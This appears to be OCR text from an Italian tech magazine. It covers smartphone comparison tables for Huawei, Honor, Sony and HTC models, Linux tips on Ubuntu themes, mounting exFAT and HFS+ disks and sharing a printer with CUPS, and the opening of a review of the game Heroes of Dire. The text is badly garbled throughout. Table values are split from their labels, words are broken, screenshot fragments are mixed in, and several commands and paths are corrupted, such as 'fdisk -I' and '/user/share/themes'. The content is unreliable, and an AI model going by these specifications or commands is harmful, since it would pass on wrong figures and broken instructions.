0,12 s / 0,25 sec / 12,0 MP / 2160p con 30 fps / 60 fps con 2,1 
MP / estese / no 


elevata (fotogrammi nitidi e ricchi di dettagli) 


elevata (fotogrammi nitidi e ricchi di dettagli) 


0,1 /0,235/ 12,0 MP/2160p con 60 fps / 240 fps con 2,0 MP 
/ un po' limitate / no 


0,42 s / 0,87 s / 13.0 MP / 2160p con 30 fps / 60 fps con 2,1 
MOP / estese / no 


elevata (buona nitidezza, lieve rumore digitale, leggero effetto tampone) 


un po' scarsa (nitidezza abbastanza buona, lieve rumore digitale) 


un po'scarsa (immagini con visibile rumore digitale, leggere sfocature) 


un po’ lento / molto numerose 


molto veloce / molto numerose 


USB 2.0 / BluetoothV 5.0 / si 


USB 2.0 / BluetoothV,4.2 / si 


un po'lenta (18,90 MB/s / 25.07 MB/s) 


un po' lento / molto numerose 
USB 2.0 / BluetoothV.4.2 / si 


un polenta (18,48 MB/s / 20,03 MB/s) 


lenta (10,79 MB/s / 20,62 MB/s) 


solo tramite Samsung Dex Station / Miracast 


tramite adattatore Apple Lightning / Airplay 


non possibile / Miracast 


poca (52,6 GB ) / 253 GB tramite microSD / 15 GB / no 


molto abbondante (245 GB) / non espandibile / 5 GB / - 


molto numerosi (compreso barometro) 


pochissima (20,57 GB) / 221 GB tramite microSD / 100 GB / no 


molto numerosi (tra cui il barometro) 


molto numerosi (tra cui il barometro) 


distorto / quasi fedele all'originale / quasi fedele all'originale (volu- 
me troppo elevato) / molto estese 


un po' distorto / quasi fedele all'originale / quasi fedele all'origina- 
le / molto estese 


distorto / quasi fedele all'originale / quasi fedele all'originale (volu- 
me troppo elevato) / estese 


molto elevata (è necessario il Google account e il Samsung account) 


elevata (navigazione offline non possibile) 


elevata (navigazione offline solo parziale) 


cavo USB, cuffie, alimentatore per ricarica rapida 


cavo USB, cuffie, alimentatore 


cavo USB, cuffie, alimentatore per ricarica rapida 


molto numerose (molto estese, numerosi sensori) 


molto elevata e veloce 


numerose (tra cui contapassi) 


molto elevata e velocissima 


un po' poche (funzioni base) 


elevata e veloce 


facile da usare / estese 


semplice da usare / estese 


semplice da usare / estesa 


confortevole / un po' scomoda 


confortevole / un po' scomoda 


confortevoli / molto scomoda 


molto numerosi (scanner per iride e sensore per impronta digitale, ingannabili) 


numerosi (ma il sensore per impronte digitali può essere aggirato) 


molto numerosi (il sensore per impronta digitale può essere aggirato) 


molto estesa (si / si / si / si) si 


‘abbastanza lunga (9:18) )/ abbastanza lunga (28:52) / 3000 mAh / si 


estesa (si / si / si / no) 


abbastanza lunga (10:57) / abbastanza lunga /32:02) / 1960 mAh / no 


estesa (si / si / si / no) 


abbastanza lunga (11:07) / abbastanza lunga (33:59) / 3230 mAh / si 


basso (151 grammi) / sottile (8,35 mm) / elevato (83%) 


basso (137 grammi) / sottile (8,3 mm) / scarso (65%) 


basso (162 grammi) / sottile (8,13 mm) / un po’ scarso (78%) 


ok / molto elevata / molto elevata / si (IP67) 


ok / molto elevata / molto elevata / si (IP67) 


ok/ molto elevata / molto elevata / si (168) 


no/no/no/si/si 


qualità buona / leggermente disturbato / si 


no/ no / no / tramite adattatore / no 


qualità buona / leggermente disturbato / si 


no / si / si / si / no 


lievemente disturbato / lievemente disturbato / si 


Voto: 7,20/ Voto: 9,06 / Voto: 8,18 


Voto: 7,14 / Voto: 7,04 /Voto: 7,80 


Voto: 7,06 / Voto: 7,66 /Voto: 7,30 


molto basso (0,13) / molto basso 


molto basse (0,14) / molto elevato 


molto basso (0,05) / basso 


CAT9, max. 452 Mbps (LTE) CAT 10, max. 452 Mbps (LTE) CAT 11, max. 600 Mbps (LTE) 
2,4 GHz e 5 GHz / ac fino a 867 Mbps 2,4 GHz e 5 GHz / ac fino a 867 Mbps 2,4 GHz e 5 GHz / ac fino a 867 Mbps 
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HUAWEI P 


HUAWEI Pio Plus HONOR 8 Pro 


Prezzo: 710 Euro Prezzo: 526 Euro 


CPU / RAM: HiSilicon Kirin 960 (4x 2,36 e 4 x 1,84 GHz) / 6 GB CPU / RAM: HiSilicon Kirin 960 (4 x 2,36 e 4 x 1,84 GHz) / 6 GB 

Dimensioni display / Risoluzione: 5,5 pollici / 2560 x 1440 pixel Dimensioni display / Risoluzione: 5,7 pollici / 2560 x 1440 pixel 
RISU LTATI IN BREVE Fotocamera frontale / posteriore: 8 Megapixel / 20 Megapixel Fotocamera frontale / posteriore: 8 Megapixel / 20 Megapixel 

Sistema operativo / SIM: Android 7.0 / nano Sistema operativo / SIM: Android 7.0 / nano 

Dimensioni: 154 x 75 x 7,5 mm Dimensioni: 157 x 78,2x 7,1 mm 

Memoria: 128 GB (non esistono altre varianti) Memoria: 64 GB (non esistono altre varianti) 


Display da 5,7 pollici, nitido e luminoso. Buona fotocamera duale. Con luce scar- | Display nitido e luminoso da 5,7 pollici. Buona fotocamera. Con luce scarsa, le 
sa, le foto risultano scarse di dettagli. Memoria intema espandibile. foto hanno un forte rumore digitale. Memoria interna espandibile. 


Quanto è efficiente la dotazione? 


Ù POPE Elevata velocità di usabilità e di lavoro. Molto comodo da usare. Presenta nume- | Elevata velocità di usabilità e di lavoro. Molto comodo da usare. Presenta nume- 
Facilità d'uso e affidabilità rosi blocchi di accesso ed offre estese funzioni per la sicurezza. rosi blocchi di accesso ed offre estese funzioni per la sicurezza. 


Quanto è idoneo il dispositivo per un uso quotidia- | Ottima autonomia di oltre 14 ore. Peso minimo, case resistente ai graffi. Può Ottima autonomia di oltre 13 ore. Un po' pesante; case resistente ai graffi.Ap- 
no? supportare una seconda scheda SIM al posto della microSD. prezzabile che lo smartphone possa gestire anche una Dual-SIM. 


Quanto è valida la qualità vocale per le chiamate e | Neltestuditivo, la qualità di ricezione si è rivelata adeguata; buona qualità voca- | Neltest uditivo, la qualità di ricezione si è rivelata adeguata; buona qualità voca- 
in ricezione? le per chiamate e ricezione. Vivavoce leggermente disturbato. le per chiamate e ricezione. Vivavoce leggermente disturbato. 


PRO LaWLAN accon velocità fino a 433 Mbps nonè velocissima, ma in compenso offre Lo smartphone supporta la WLAN ac fino a 433 Mbps ed un veloce trasferimen- 
Qualità della connessione per Internet? una LTE con velocità molto elevata fino a 600 Mbps (LTE, "CAT 12") to dati via LTE CAT 10 con una velocità massima di 452 Mbps. 


RISULTATO DEL TEST 
RISULTATI DEL TEST IN DETTAGLIO 


Quanto è efficiente la dotazione? 
Schermo: luminosità / contrasto / fedeltà cromatica 
Qualità schermo (risoluzione / densità pixel / diagonale del display) 


Test visivo: qualità foto con luce scarsa / con flash / per eventi sportivi (voto) 


abbastanza luminoso (609,1 Cd) / basso (845:1) / elevata (95,80%) — | abbastanza luminoso (542,32 Cd)/basso (1574:1)/ un po'bbasso (92,30%) 
elevata (1440x 2560 Pixel / 534 ppi / 13,88 cm) elevata (1140x 2560 Pixel / 492 ppi /14,46.cm) 


pri ein (84) / un po'scure (4,8) / leggere socature su sog" | intenso rumore digîtale (3) / scure (5,4) / immagini con sfocature (6) 


ei Fresa scarsi, alterazioni cromatiche, IntensO MI | elevata (Voto:8,00) / abbastanza ricca di dettagli (Voto: 6,42) 


Qualità foto con luce diurna: Giudizio tecnico / Test visivo 


Qualità dei video con luce diuma 


Latenza di scatto / Tempo di memorizzazione / risoluzione foto / video / ral- | 0,13s/0,225/20,0 MP / 2160p con 30fps / 60fps con 2,1 MPO / estese / 
lenti con frequenza max. fotogrammi video / impostazioni manuali / zoom no 


Fotocamera frontale: qualità un po'scarsa (intenso rumore digitale, aree della foto sfocate) 
Velocità del browser / funzioni un po' lento / molto numerose 
Connessioni per trasferimento dati: USB / Bluetooth / NFC USB2.0 / BluetoothV/4.2 / si 

Velocità max. via USB (in fase di scrittura / lettura) un po'lenta (12,03 MB/s / 25,79 MB/s) 
Trasferimento contenuto visualizzato da schermo: via cavo / wireless non possibile / Miracast 
Memoria interna / max. / Cloud /Appinstallabili su memory card un po’ poca (109 GB) / 309 GBtramite microSD / 15GB / no 
Sensori di posizione e funzioni numerosi (tra cui sensore per ambiente circostante, bussola) 


Qualità suono con cuffie / impianto HI-Fl / uscita cuffie / Funzioni lettore 

MP3 

Completezza funzioni preimpostate dal produttore molto elevata (navigazione offline solo parziale) molto elevata (navigazione offline solo parziale) 
Accessori in dotazione cavo USB, cuffie, case, alimentatore per ricarica rapida cavo USB, alimentatore per ricarica rapida 


n mesa (ona conci 
Facilità d'uso e affidabilità? 
cata o: cato: 
Maneggevolezza e comfort di usabilità / funzioni di ricerca semplice da usare / un po' limitate elevata e veloce 
Impartizione comandi vocali / funzione lettura ad alta voce confortevole / un po' scomoda confortevole / un po' scomoda 
Blocchi per accesso al dispositivo numerosi (ma il sensore per impronta digitale può essere manomesso) numerose (ma il sensore per impronta digitale può essere manomesso) 
esta Gi) | 5606/9/5/m) 
Quanto è idoneo il dispositivo per un uso quotidiano? 


Autonomia batteria (ore:min): utilizzo tipico /utilizzo minimo / capacità / i i i 
possilità di ricarica rapida lunga (14:21) / lunga (43:23) /3650 mAh/ si 


Peso / spessore / rapporto area display con frontale del dispositivo basso (165 grammi) / sottile (7,5 mm) / un po scarso (71%) 
Test di caduta / Resistenza ai graffi scocca / schermo / impermeabilità ok / molto elevata / molto elevata / no 


Dual SIM / sostituzione batteria / radio / connettore per cuffie / ricarica a in- 
duzione 


Quanto è valida la qualità vocale per le chiamate e in ricezione? 

Uso deltelefono: Test uditivo / vivavoce / idoneo per HD Voice lievemente disturbato / lievemente disturbato / si 
Qualità d'invio e ricezione con UMTS / LTE 800 / LTE 1800 Voto: 6,54 / Voto: 8,26 / Voto: 7,22 

Indice radiazioni rilevato da COMPUTER BILD / Valore radiazioni molto basso (0,1) / elevato 

Qualità della connessione per Internet? 


Velocità max. della connessione mobile per trasferimento dati CAT 12, max, 600 Mbps (LTE) molto basso (0,16) / molto elevato 
Frequenze WLAN / standard e velocità nominale per collegamento 2,4 GHz e 5 GHz / ac fino a 433 Mbps 2,4 GHz e 5.GHz / ac fino a 433 Mbps 
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elevata (fotogrammi ricchi di dettagli) 
0,15s/0,235/12,0MP/2160p con 30fps / 60 fps con 2,1 MP / estese / no 


elevata (buona nitidezza e numerosi dettagli, colori un po'sbiaditi) 
un po” lento / molto numerose 

USB2.0 / BluetoothV.4.2 / si 
un po'lenta (14,44 MB/s / 24,26 MB/s) 

non possibile / Miracast 

poca (47,06 GB) / 175 GBtramite microSD / 15 GB / no 
numerosi (dotazione di base) 


un po' distorto / un po' distorto / quasi fedele all'originale / estese non in dotazione / quasi fedele all'originale / quasi fedele all'originale / estese 


lunga (1:24) / lunga (41:31) / 3900 mAh /si 


un po' elevato (184 grammi) / sottile (7,1 mm) / un po’ scarso (73%) 
ok / molto elevata / molto elevata / no 


si / no / no/ si / no 


no/no/no/si/no 


buona qualità / lievemente disturbato / si 
Voto: 6,86 / Voto: 8,20 / Voto: 7,24 
molto basso (0,16) / molto elevato 


| HUAWEI P10 


HUAWEI pio 


Prezzo: 489 Euro 


CPU / RAM: HiSilicon Kirin 960 (4 x 2,36 e 4 x 1,84 GHz) / 4 GB 
Dimensioni display / Risoluzione: 5,1 pollici / 1920 x 1080 pixel 
Fotocamera frontale / posteriore: 8-Megapixel / 20 Megapixel 
Sistema operativo / SIM: Android 7.0 / nano 

Dimensioni: 145,3 x 69,5.x 7,2 mm 

Memoria: 64 GB (non esistono altre varianti) 


SONY Xperia XZs 


Prezzo: 649 Euro 


CPU / RAM: Qualcomm Snapdragon 820 con 4 core x 2,15 GHz) / 4 GB 
Dimensioni display / Risoluzione: 5,2 pollici / 1920 x 1080 pixel 
Fotocamera frontale / posteriore: 13 Megapixel / 19 Megapixel 
Sistema operativo / SIM: Android 7.1.1 / nano 

Dimensioni: 160 x 72,2 x 9,1 mm 

Memoria: 32 GB (non esistono altre varianti) 


r 


HTC U Ultra 


Prezzo: 639 Euro 


1 


CPU / RAM: Qualcomm Snapdragon 821 con 4 core x 2,15 GHz) / 4 GB 
Dimensioni display / Risoluzione: 5,7 pollici / 2560 x 1440 pixel 
Fotocamera frontale / posteriore: 16 Megapixel / 12 Megapixel 
Sistema operativo / SIM: Android 7 con HTC Sense / nano 
Dimensioni: 162 x 79,7 x 9,8 mm 

Memoria: 64 GB (non esistono altre varianti) 


Display nitido e luminoso da 5,1 pollici; con straordinaria fotocamera duale. 
Sensore per impronta digitale affidabile, Memoria intera espandibile. 


Display da 5,2 pollici, nitido e luminoso. Punto forte della fotocamera, le riprese 
al rallentatore. Offre spazio per inserire una scheda di memoria. 


Schermo enorme da 5,7” con minuscolo display extra per informazioni aggiun- 
tive. La miglior fotocamera per scattare immagini con luce diuma. 


Grazie alle sue misure compatte, l'usabilità dello smartphone è semplicissima. 
| Huawei P10 offre un'elevata velocità di lavoro. 


L'usabilità rimane semplice, malgrado la comice sia molto ampia. Buona l'ele- 
vata velocità di lavoro dello smartphone. 


Smartphone dalla linea snella, ma molto ampio e con una superficie vetrata 
scivolosa. La velocità di lavoro è abbastanza elevata. 


Buona autonomia di oltre 13 ore. Peso minimo e case resistente ai graffi, E 
possibile inserire una seconda scheda SIM al posto della microSD. 


Autonomia abbastanza lunga, peso minimo. Lo smartphone non è impermeabi- 
le e non supporta la seconda SIM. 


L'autonomia di 11 ore è ok. Il case antigraffio non è impermeabile. Non suppor- 
ta la seconda SIM. 


Nel test uditivo, la qualità di ricezione si è rivelata adeguata. Buona qualità vo- 
cale per chiamate e ricezione. Vivavoce leggermente disturbato. 


Nel test uditivo la qualità di ricezione si è rivelata adeguata. Il vivavoce rilascia 
dei fruscii, Buona qualità vocale per chiamate e ricezione. 


Nel test uditivo la qualità di ricezione si è rivelata adeguata. Buona qualità vo- 
cale per chiamate e ricezione. Basso livello di radiazioni. 


LaWLAN ac con un velocità massima di 433 Mbps non è velocissima, ma in compenso la 
velocità della LTE è molto elevata arrivando fino a 600 Mbps (LTE "CAT 12"). 


abbastanza luminoso (565,1 Cd)/basso (1516:1)/ molto elevato (99,66%) 


Losmartphone è in grado di supportare la WLAN ac fino a 433 Mbps, nonché un ve- 
loce trasferimento dati via LTE CAT 9 con una velocità max. di 452 Mbps. 


Veloce WLAN ac fino a 867 Mbps.Anche la LTE con velocità massima fino a 
452 Mbps (LTE CAT 9) è più veloce della maggior parte delle reti attuali. 


abbastanza luminoso (596,9 Cd)/un po' basso (2165:1)/ elevato (95,10%) 


elevata (1080 x 1920 Pixel / 431 ppi / 12,99 cm) 
intenso rumore digîtale (5) / povere di dettagli (4,4) / sovraesposte (6,4) 


un po' scuro (510,1 Cd) / basso (977:1) / molto elevato (99,28%) 


elevata (1080 x 1020 Pixel / 424 ppi / 13,21 cm) 


elevata (1440 2560 Pixel / 515 ppi / 14,62 cm) 


sfocate (3) / rumore digitale (3) / leggere sfocature con immaggini in movimen- 
to(9) 


immagini luminose (5,4) / un po' scure (5) / immagini di soggetti in movimento 
con sfocature (6,4) 


elevata (Voto: 8,46) / visibili sfocature sui bordi (Voto: 5,18) 


elevata (Voto: 8,38) / alterazioni cromatiche (Voto: 6,58) 


elevata (Voto: 8,80) / ricca di dettagli, rumore digitale scarso (Voto: 6,84) 


elevata (fotogrammi nitidi e ricchi di dettagli) 


elevata (fotogrammi ricchi di dettagli, ma si notano effetti di stabilizzazione) 


elevata (fotogrammi ricchi di dettagli e nitidi) 


0,18 /0,255/20,0MP / 2160p con 30fps / 60fps con 2,1 MP / estese / 
no 


0,15/0,25/19,0MP/2178p con 30 fps / 960 fps con 0,9 MP / un po'limi- 
tate / no 


0,2s/0,485/ 12,0 MP / 2160p con 30 fps / 120 fps con 0,9 MP / un po'li- 
mitate / no 


un po'scarsa (consistente rumore digitale, immagini lievemente sfocate) 


elevata (buona nitidezza e numerosi dettagli, colori un po’ sbiaditi) 


elevata (dettagli buoni, colori abbastanza buoni, lievi ombreggiature 


un po lento / molto numerose 


un po’ lento / molto numerose 


un po' lento / molto numerose 


USB 3.0 / BluetoothV.4.2 / si 


USB 2.0 / BluetoothV.4.2 / si 


USB2.0 / BluetoothV.4.2 / si 


un po'lenta (12,45 MB/s / 24,07 MB/s) 


lenta (9,72 MB/s / 21,77 MB/s) 


un po’ lenta (13,22 MB/s / 21,24 MB/s) 


non possibile / Miracast 


non possibile / Miracast 


non possibile / Miracast 


poca (48,15 GB) / 248,15 GB tramite microSD / 15 GB / no 


molto poca (19,77 GB) / 220 GBtramite microSD / 15 (GB / no 


poca (52,85 GB) / 259 GB tramite microSD / 15 GB / si 


numerosi (tra cui sensore per ambiente circostante, bussola) 


molto numerosi (buona dotazione ) 


numerosi (tra cui sensore per ambiente circostante, bussola) 


un po' distorto/ un po' distorto / quasi fedele all'originale / estese 


distorto / quasi fedele all'originale / un po' distorto / estese 


distorto / quasi fedele all'originale / quasi fedele all'originale / molto estese 


molto elevata (navigazione offline solo parziale) 


elevata (manca App per annotazioni, navigazione offline solo parziale) 


molto elevata (navigazione offline solo parziale) 


cavo USB, cuffie, scocca, alimentatore per ricarica rapida 


cavo USB, cuffie, alimentatore per ricarica rapida 


cavo USB, cuffie, case alimentatore per ricarica rapida 


poche (solo funzioni base) 


elevata e veloce 


un po’ poche (diario, altre attività rilevabili viaApp) 


elevata e veloce 


numerose (buona dotazione, Underarmour Record) 


elevata e veloce 


semplice / un po' limitate 


semplice / estese 


semplice da usare / un po' limitate 


confortevole / un po' scomoda 


confortevole / molto scomoda 


confortevole / un po' scomoda 


numerosi (ma il sensore per impronta digitale può essere manomesso) 


numerosi (ma il sensore per impronta digitale può essere manomesso) 


numerose (ma il sensore per impronta digitale può essere manomesso) 


estesa (si / si / si / no) 


lunga (13:04) / lunga (39:07) /3100 mAh / si 


estesa (si / si / si / no) 


lunga (10:22) / abbastanza lunga (31:51) / 2900 mAh/ sì 


estesa (si / si / si / no) 


‘abbastanza lunga (11:15) / abbastanza lunga (34:03) / 3000 mAh / si 


basso (147 grammi) / sottile (7,2 mm) / un po'scarso (72%) 


basso (161,95 grammi) / sottile (9,1 mm) / scarso (65%) 


basso (171 grammi) / sottile (9,8 mm) / um po' scarso (71%) 


ok / molto elevata / molto elevata /.no 


0k/ molto elevata / molto elevata / si (IP68) 


ok / molto elevata / molto elevata / no 


no/no/no/si/no 


lievemente disturbato / lievemente disturbato / si 


no / no / no/ si / no 


lievemente disturbato / lievemente disturbato / si 


no / no / no / tramite adattatore / no 


buona qualità / lievemente disturbato / si 


Voto: 6,66 / Voto: 8,18 / Voto: 7,64 


Voto: 6,84 / Voto: 8,74 / Voto: 8,14 


Voto: 7,12 / Voto: 7,10 / Voto: 7,58 


molto basso (0,11) / elevato 


basso (0,31) / elevato 


molto basso (0,06) / basso 


CAT 12, max. 600 Mbps (LTE) CAT9, max. 452 Mbps (LTE) CAT9, max. 452 Mbps (LTE) 
2,4 GHz e 5 GHz / acfino a 433 Mbps 2,4 GHz e 5 GHz / ac fino a 867 Mbps 2,4 GHz e 5 GHz / ac fino a 867 Mbps 
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Tips & Tricks 


BI Trucchi e consigli per usare subito GNU/Linux come un esperto, trovare 
soluzioni rapide ai problemi e sfruttare appieno le potenzialità del sistema 


UN NUOVO TEMA 
SU UBUNTU 17.04 


L'incredibile versatilità di 
Ubuntu ha permesso che 
questa distribuzione raggiungesse 
numeri impensabili. GNU/Linux 
non aveva la diffusione che ha oggi 
ed è proprio grazie a distribuzioni 
come Ubuntu se è ormai presente 
sul PC di tanti utenti che un tempo 
avrebbero preferito utilizzare 
sistemi operativi commerciali. 

La grande flessibilità e usabilità 
di questa distribuzione ha reso 
possibile il passaggio indolore 
da OS X o Windows a GNU/ 
Linux permettendo di usufruire 
delle stesse funzioni (e anche di 
più) offerte dalla “concorrenza”. 
La realizzazione di documenti, 
la creazione di file di grafica e 
l'interazione con ogni tipologia di 
periferica in commercio è diventata 
ormai semplice e immediata. 
Così come è diventata ancora più 
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Rivestimenti 


semplice l’interazione con questo 
sistema e la personalizzazione 
completa sia delle sue funzioni 
che dell’interfaccia grafica. Anche 
se questo merito va dato agli 
sviluppatori degli ambienti desktop 
(come Gnome, KDE e Unity). 
Qualsiasi utente, prima o poi, spinto 
dalla voglia di personalizzare il suo 
sistema si porrà una domanda: 
com'è possibile installare un tema 
su Ubuntu? La risposta è semplice: 
in molti modi diversi! 

Per installare un tema su Ubuntu, 
possiamo infatti affidarci al 
tool Ubuntu Tweak Tool. Basta 
installarlo, avviarlo e spostarsi nella 
scheda Tweaks. Al suo interno 
possiamo selezionare la voce Tema 
e sceglierne uno dal numeroso 
elenco. Un altro metodo consiste 
nell'utilizzo di specifici repository. 
In quest'ultimo caso le operazioni 
da eseguire sono semplici: 
aggiungere il PPA, ad esempio 


gtk:2.0 


metacityi 


tas 
È 
ladex.theme 


con sudo  apt-add-repository 
ppa:numix/ppa, aggiornare la 
lista pacchetti con sudo apt-get 
update e lanciare il comando sudo 
apt-get install numix-icon-theme 
numix-icon-theme-circle: in questo 
esempio abbiamo considerato il 
tema Numix, ma la procedura è 
la medesima per gli altri temi. | 
pacchetti da installare variano in 
funzione del tema desiderato. 
Infine, il sistema più semplice 
consiste nel download di un 
archivio contenente tutti i file del 
tema: estraiamo il contenuto in 
una specifica directory e Ubuntu 
lo riconoscerà automaticamente 
e immediatamente. La directory 
in questione non esiste di default 
e dovremo crearla in /user/share/ 
themes o in -/.themes. AI termine, 
potremo selezionare il tema da 
usare in Unity Tweak Tool o dal 
menu Aspetto delle Impostazioni di 
Sistema di Ubuntu. 


LEGGERE UN DISCO 
HFS 0 EX FAT 


10, capitare di dover 
È pos utilizzare più sistemi operativi 
e di avere dunque la necessità di 
leggere e scrivere su uno stesso 
disco rigido esterno. Cosa succede 
in questi casi? Se il disco è stato 
usato. esclusivamente su Windows 
probabilmente sarà stato 
formattato in NTFS. Collegando un 
disco formattato con questo file 
system su Ubuntu non avremo 
problemi a scrivere o leggere file, 
ma lo stesso non si può dire su 
qualsiasi altra distro. Qualora il 
disco sia stato usato su OS X, il file 
system sarà HFS+. Questa volta 
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BM Fig. 2 * L'interfaccia grafica di Green Recorder 


Ubuntu potrà soltanto leggere da 
quest’ultimo! Come fare per poter 
leggere e scrivere su disco? La 
soluzione a questo dilemma è l’uso 
di un semplice driver per GNU/ 
Linux. Per poter scrivere su HFS ci 
affideremo a hfsprogs, mentre per 
ExFAT utilizzeremo Fuse. Vediamo 
come installare quest'ultimo. 
Apriamo una nuova finestra del 
terminale di Ubuntu e lanciamo 
sudo apt-get install exfat-fuse 
exfat-utils. Usiamo sudo fdisk -I per 
ottenere una lista dei dischi 
collegati al sistema e delle partizioni 
associate. Identifichiamo il disco 
che abbiamo intenzione di montare 
e prendiamo nota del numero alla 
voce /dev/sdXX. Infine con. il 
comando sudo mount -t exfat /dev/ 
SAdXX /media/nomeutente/ 
montiamo il disco avendo cura di 
sostituire sdXX con il numero 
appena trovato. Come possiamo 
notare, l'opzione -t ci consente di 
specificare il file system EXFAT. 


Infine, lanciamo sudo chown 
utente:utente /media/utente/ 
pathdisco per aggiornare i 


permessi. Sarà possibile interagire 
con il disco tramite il file manager 
del nostro sistema. Ora tocca a 
Hfsprogs. Pér installare questo 
driver digitiamo sudo apt-get install 
hfsprogs. Come visto in 
precedenza, creiamo il path per il 
montaggio del disco esterno e 
lanciamo sudo mount -t hfsplus -o 
remount,rw -force /dev/sdXX / 
media/utente/pathdisco. E come 


per magia potremo leggere e 
scrivere anche su un disco 
destinato a OS X. 

E se il nostro intento fosse stato il fix 
degli errori su disco per recuperare 
un disco non funzionante? Per 
ExFAT attualmente non c’è niente 
da fare ma per HFS+ basterà 
digitare sudo fsck.hfsplus -f /dev/ 
SAXX. 


STAMPANTE IN RETE 


La grande crescita di Internet 

e lo sviluppo di nuove 
infrastrutture di rete ha reso 
possibile la diffusione di reti ad alta 
velocità e la fruizione di numerosi 
contenuti. Questo ha fatto sì che 
per consentire a molti utenti di 
usufruire di una connessione al 
Web i modem/router, dispositivi un 
tempo presenti in piccoli uffici o 


up fig Amministrazione - CU: * Wa 

i Amministrazione 
Printers 
Add Printer 


Find New Printers Manage Printers 


RSS Subscriptions 


aziende, si diffondessero anche fra 
le mura domestiche. Entra quindi 
nell'ottica dell’utente la disponibilità 
e la distribuzione di contenuti e 
servizi senza fili. Una delle 
periferiche più usate su PC è 
certamente la stampante e mentre 
un tempo venivano collegate via 
USB, al giorno d’oggi esistono 
tantissime soluzioni Wi-Fi pronte 
all'uso. E se volessimo trasformare 
una comunissima stampante USB 
in una di rete? Cosa fare per 
condividerla con tutti gli utenti della 
rete domestica? A pag. 48 parliamo 
proprio di questa possibilità. 
Esistono tre differenti soluzioni: 
e un print server Wi-Fi esterno; 
eun print server interno al 
router, con il vincolo di avere la 
stampante vicina al router; 
e la condivisione tramite un PC. 
Vediamo come realizzare 
quest’ultima soluzione. Apriamo 
il terminale e lanciamo sudo apt- 
get install cups per installare il 
servizio di stampa. Apriamo un 
browser e digitiamo localhost:631 
per accedere alla pagina di 
configurazione del server Cups. 
Spuntiamo Share printer connected 
to this system, Allow Printing 
from Internet e Allow Remote 
Administration del pannello 
Administration e clicchiamo su 
Change Settings. Il servizio sarà 
riavviato e sarà ora possibile 
installare la stampante di rete da 
qualsiasi PC della rete locale. 


BM Fig.3* 

La finestra di 
informazioni 
del sistema di 
Ubuntu 17.04 


Mem Etpprioa: | i XiewPaostog, 


7 7 Allow users to cancel any job (not just their own) 
1) Save debugging information for troubleshoofing 
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Il fantastico mondo 
di Heroes of Dire 


HI Comanda una squadra di combattenti e con le giuste strategie 
cerca di arrivare alla vittoria che porterà tesori, fama e gloria! 


Licenza: Free 
Sito web: www.dire.com 


viluppato. dalla. piccola. software 

house indipendente a stelle e strisce 

Speelbook (www.spellbook.com) e 
basato. sul motore grafico Unity (https:// 
unity3d.com), Heroes of Dire (da ora per 
semplicità HoD) è un dark fantasy strategico- 
tattico a turni appartenente ad un misto di 
categoria MMORPG (Massively Multiplayer 
Online Role-Playing Game), RTS (Real Time 
Strategy) e RPG (Role-Playing Game). || 
progetto HoD è iniziato a Dicembre 2015 con 
un annuncio su Kickstarter (www.kickstarter, 
com) a cui fece seguito il contributo di 486 
persone che permise di dare il via allo sviluppo 
del gioco a partire da Maggio 2016. A ottobre 
dello stesso anno veniva rilasciata la prima 
versione beta del gioco. Con il tempo sono 
state rilasciate ulteriori versioni che hanno 
portato all'attuale. condizione che, come 
Vedremo, è in una fase molto avanzata. 


STEAM? NON È NECESSARIO 


È inevitabile, quando un gioco inizia ad 
avere un discreto successo e in più presenta 
Una grafica decente viene adocchiato 
dalle piattaforme di contenuto digitale 
e una di queste è proprio Steam (http:// 
store.steampowered.com). È infatti possibile 
installare HoD direttamente utilizzando il 
client Steam, almeno per coloro che lo hanno 
installato sulla propria distribuzione. E per 
chi non volesse utilizzare il client Steam? 
Niente paura, la Speelbook distribuisce un 
client stand-alone, un file da scaricare con 
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01 'Heroesof Dire 
SpeL8oox Account or E-Main HEROES OF DIRE - MESSAGE OF THE DAY 


DireLinux 


If you enjoy the game please consider leaving a review! 


We're a small team who depends on word-of-mouth to survive! 


PASSWORD 
Visit www.DIRE.com 


(RAVE PASSWORD 


LOGIN 


DR) v1.2.11 
- Fixed: Client crashes often in battles 


- SUPPORT - FORUMS - WIKI - ARMORY - SILVERS - 


- Fixed: Daily Reward login message time is incorrect 


Invasions drop better loot 


| NEW ACCOUNT | - 


- Recalling Guild Hall will not remove territory 
-G 


uild Hall Vaults do not block movement once guards attacked 


[RESET PASSWORD! 


* Item Condition loss on death now 3 to 4 points (Was 5 to 8) 
- Item Max Condition loss on death now 50% chance (Was 100%) 
- Daily battle rewards! Fight to win powerful gear! 


| v1.6.X - IN PROGRESS 
fed SETTINGS {ae Halberd, and Spear can reach 2 tiles instead of 1 


= New weapon classes 


= Shields can BASH to destroy blocked movement tiles in battle 
= Quick Chat popup instead of full screen chat window 


- Fighter Pets 
- Achievements 


A My terious Tower has ti discovered by Edain the Explorer! 
Sal to The Tower from Tire Hem (Outskirts) 
- Read about The Tower at www.dire.wiki/the-tower/ 


HEROESO 


“DIRE 


Fig, 1 Menu generale di HoD: in evidenza bug e problemi corretti nel client 


eseguibile da lanciare. Puntiamo il browser 
al sito Web ufficiale del gioco e nella home 
page raggiungiamo la sezione Desktop 
Downloads. nella. quale. troveremo il 
pulsante Linux Direct. Clicchiamoci su, per 
scaricare il file di nome heroesofdire-linux. 
zip (circa 90 MB) che costituisce il client di 
gioco. Decomprimendolo con il comando 


unzip heroesofdire-linux.zip verrà creata 


una cartella di nome heroesofidre-linux. 
All’interno di essa troveremo file di supporto 
alle architetture a 32 e 64 bit. Lanciamo 
l'eseguibile di pertinenza, ad esempio 
HeroesOfDire.x86_64 per architettura a 64 
bit, quindi seguiamo il primo tutorial per le 
prime informazioni necessarie. 


UNA PANORAMICA 


Che il gioco sia realizzato con attenzione 
maniacale dei più piccoli dettagli lo si nota già 
a partire dalla musica d'apertura a dir poco 
imperiale! Tutto. le composizioni musicali 
durante il gioco e/o i diversi quadri/livelli, sono 
licenziate attraverso iLicenseMusic (htp:/ 
ilicensemusic.com/)) e Extreme Production 
Music (www.extrememusic.com. Come già 
anticipato, HoD è uno strategico a turni 
tra squadre di combattenti che possiamo 
suddividere principalmente in 6 eroi: Arciere, 
Mago, Furfante,  Guaritore, Paladino, 
Guerriero. Il punto di partenza è il livello 
1: dopo ogni vittoria si guadagneranno 
dobloni d’argento e/o un passaggio di livello. 


Creiamo un account 


Registriamoci e iniziamo a configurare il gioco 


CREATE NEW SPELLEOUK ACCOUNT 
SPELLEDDIEOM Arzioer Nami 


Niw Aecnovi Passera 


TeMas Avictai ma pasa riceva Y 


SUBMIT CANCEL 


I DATI 
0 1 Al primo avvio apparirà una pop- 

up per la creazione dell'account 
di gioco. Clicchiamo su Create Now, accet- 
